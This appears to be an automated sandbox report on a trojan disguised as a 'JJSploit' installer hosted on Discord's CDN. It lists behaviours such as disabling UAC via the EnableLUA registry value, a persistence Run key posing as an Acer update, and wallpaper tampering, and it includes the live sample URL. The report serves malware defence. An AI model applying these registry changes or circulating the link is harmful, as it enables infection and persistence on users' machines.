Malware Analysis Report

2025-03-15 08:28

Sample ID 241020-zjjyhs1cqm
Target https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&
Tags defense_evasion discovery evasion persistence ransomware trojan upx
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369& was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion persistence ransomware trojan upx

UAC bypass

Disables Task Manager via registry modification

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Sets desktop wallpaper using registry

Subvert Trust Controls: Mark-of-the-Web Bypass

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry key

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 20:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 20:44

Reported

2024-10-20 20:46

Platform

win11-20241007-en

Max time kernel

88s

Max time network

90s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739307073391615" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "147" | C:\Windows\system32\LogonUI.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

NTFS ADS

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3140 wrote to memory of 4144 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 4144 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3396 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 2828 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 2828 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
